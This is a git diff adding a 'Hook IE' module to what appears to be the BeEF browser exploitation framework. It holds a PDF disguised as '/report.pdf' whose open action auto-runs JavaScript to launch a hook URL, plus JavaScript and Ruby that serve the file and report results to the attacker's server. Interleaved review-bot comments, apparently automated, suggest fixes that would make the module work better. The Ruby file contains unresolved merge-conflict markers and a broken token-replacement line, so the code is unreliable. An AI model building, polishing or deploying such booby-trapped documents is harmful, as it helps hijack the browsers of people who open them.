diff --git a/modules/browser/hook_ie/bounce_to_ie.pdf b/modules/browser/hook_ie/bounce_to_ie.pdf
new file mode 100755
index 000000000..f0230f9a8
--- /dev/null
+++ b/modules/browser/hook_ie/bounce_to_ie.pdf
@@ -0,0 +1,79 @@
+%PDF-1.1
+1 0 obj
+<<
+ /Pages 3 0 R
+ /OpenAction 4 0 R
+ /Type /Catalog
+>>
+endobj
+2 0 obj
+<<
+ /Encoding /MacRomanEncoding
+ /Subtype /Type1
+ /BaseFont /Helvetica
+ /Type /Font
+ /Name /F1
+>>
+endobj
+3 0 obj
+<<
+ /Kids [ 5 0 R ]
+ /Type /Pages
+ /Count 1
+>>
+endobj
+4 0 obj
+<<
+ /S /JavaScript
+ /JS 6 0 R
+>>
+endobj
+5 0 obj
+<<
+ /MediaBox [ 0 0 795 842 ]
+ /Contents 7 0 R
+ /Parent 3 0 R
+ /Resources <<
+ /Font <<
+ /F1 2 0 R
+ >>
+ /ProcSet [ /PDF /Text ]
+ >>
+ /Type /Page
+>>
+endobj
+6 0 obj
+<<
+ /Length 1708
+>>stream
+app.launchURL("",true);
+endstream
+endobj
+7 0 obj
+<<
+ /Length 48
+>>stream
+BT
+
+ET
+endstream
+endobj
+xref
+0 8
+0000000000 65535 f
+0000000010 00000 n
+0000000087 00000 n
+0000000209 00000 n
+0000000278 00000 n
+0000000332 00000 n
+0000000513 00000 n
+0000002278 00000 n
+trailer
+<<
+ /Size 8
+ /ID [ (11f570958af49b794c95ff1c6be3bac5) (11f570958af49b794c95ff1c6be3bac5) ]
+ /Root 1 0 R
+>>
+startxref
+2381
+%%EOF
diff --git a/modules/browser/hook_ie/command.js b/modules/browser/hook_ie/command.js
new file mode 100644
index 000000000..dbae263f2
--- /dev/null
+++ b/modules/browser/hook_ie/command.js
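Review bot: `bounce_to_ie.pdf` is added with `new file mode 100755`; it is a data file that module.rb only reads line by line, so it should be committed as 100644. The document is also undocumented: its catalog `/OpenAction` points at a `/S /JavaScript` action whose stream calls `app.launchURL(...)`, so it acts as soon as a reader with document JavaScript enabled opens it and does nothing in a reader with JavaScript disabled, yet no file in the commit says so. I would put that in the module's `description`, along the lines of `bounce_to_ie.pdf runs app.launchURL from /OpenAction and needs a PDF reader with JavaScript enabled`. The `/Length 1708` on object 6 does not match the stream as shown, although the page may simply have dropped the placeholder text.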
@@ -0,0 +1,22 @@
+//
+// Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var pdf_url = '/report.pdf';
+ window.open( pdf_url, '_blank');
+
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, "Attempted to open PDF in default browser.");
+});
diff --git a/modules/browser/hook_ie/config.yaml b/modules/browser/hook_ie/config.yaml
new file mode 100644
index 000000000..42e357ded
--- /dev/null
+++ b/modules/browser/hook_ie/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ hook_ie:
+ enable: true
+ category: "Browser"
+ name: "Hook IE"
+ description: "This module will attempt to hook IE if it is the default browser."
+ authors: ["saafan"]
+ target:
+ user_notify: ["FF", "O"]
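Review bot: In command.js, `var pdf_url = '/report.pdf';` repeats by hand the mount point that module.rb passes as `'/report', 'pdf'` to `AssetHandler.instance.bind`, so a change on either side leaves the other pointing at nothing, with no error. A comment on that line, for example `// must match the path bound in module.rb (AssetHandler bind: '/report' + 'pdf')`, would make the coupling visible to the next maintainer. The string sent through `beef.net.send` is emitted whatever `window.open` returned, so the stored result records only that the call was made, which the comment could also state.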
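Review bot: The `target:` block in config.yaml lists only `user_notify: ["FF", "O"]`, while `set_target` in module.rb of this same commit declares `'verified_status' => VERIFIED_WORKING` for `'browser_name' => ALL`. The two descriptions of the same module disagree, and which of them the framework honours is not visible from this diff. Bring them into line, or keep a single source, so that the module is not presented as verified on browsers the YAML does not list. `name`, `description`, `category` and `authors` are likewise duplicated between the two files and will drift the same way.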
diff --git a/modules/browser/hook_ie/module.rb b/modules/browser/hook_ie/module.rb
new file mode 100644
index 000000000..c2317af7f
--- /dev/null
+++ b/modules/browser/hook_ie/module.rb
@@ -0,0 +1,78 @@
+<<<<<<< .mine
+class Hook_ie < BeEF::Core::Command
+=======
+#
+# Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Detect_details < BeEF::Core::Command
+>>>>>>> .r1087
+
+ def initialize
+ super({
+ 'Name' => 'Hook IE',
+ 'Description' => %Q{
+ This module will attempt to hook IE if it is the default browser.'
+ },
+ 'Category' => 'Browser',
+ 'Author' => ['saafan'],
+ 'File' => __FILE__
+ })
+
+ #Get the servers configurations.
+ configuration = BeEF::Core::Configuration.instance
+
+ #The hook url to be replace the token in the original pdf file.
+ hook_uri = "http://#{configuration.get("beef.http.dns")}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.demo_path")}"
+
+ # A new pdf file containg the actual hook URI instead of the dummy token.
+ configured_hook_file = File.open("./modules/browser/hook_ie/bounce_to_ie_configured.pdf","w")
+
+ # The original pdf file contains a token that will get replaced during the initialization with
+ # the actual hook URI of beef. Note that the hook URI is accessed via the DNS name.
+ File.open('./modules/browser/hook_ie/bounce_to_ie.pdf',"r") { |original_hook_file|
+ original_hook_file.each_line { |line|
+ # If the line includes the hook token, then replace it with the actual hook URI
+ if(line.include? 
'')
+ line = line.sub(//, hook_uri)
+ end
+ #write the line to a new file
+ configured_hook_file.write(line)
+ }
+ }
+
+ configured_hook_file.close()
+
+
+ #Bind the configured PDF file to the web server.
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/hook_ie/bounce_to_ie_configured.pdf', '/report', 'pdf', -1);
+
+ set_target({
+ 'verified_status' => VERIFIED_WORKING,
+ 'browser_name' => ALL
+ })
+
+ use 'beef.dom'
+ use_template!
+ end
+
+ def callback
+ content = {}
+ content['result'] = @datastore['result']
+
+ save content
+ #update_zombie!
+ end
+
+end
\ No newline at end of file
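Review bot: module.rb is committed with unresolved merge-conflict markers at the top of the hunk (`<<<<<<< .mine`, `=======`, `>>>>>>> .r1087`) and two competing class lines, `class Hook_ie < BeEF::Core::Command` and `class Detect_details < BeEF::Core::Command`, so the file cannot be parsed as Ruby. Delete the three marker lines and keep the licence header followed by a single class line; `Hook_ie` matches the module directory, and `Detect_details` looks like a leftover from another module. Separately, `initialize` opens `bounce_to_ie_configured.pdf` with a bare `File.open(..., "w")` and closes it by hand, so an exception while reading the template leaks the handle; the block form already used for the read would close it in every case. Both paths start with `./` and therefore depend on the process working directory, and the file is rewritten on every instantiation of the class. `hook_uri` is spliced into the PDF's JavaScript string unescaped and with a fixed `http://` scheme, which deserves at least a comment such as `# config values are inserted verbatim into a JS string literal; they must not contain quotes`.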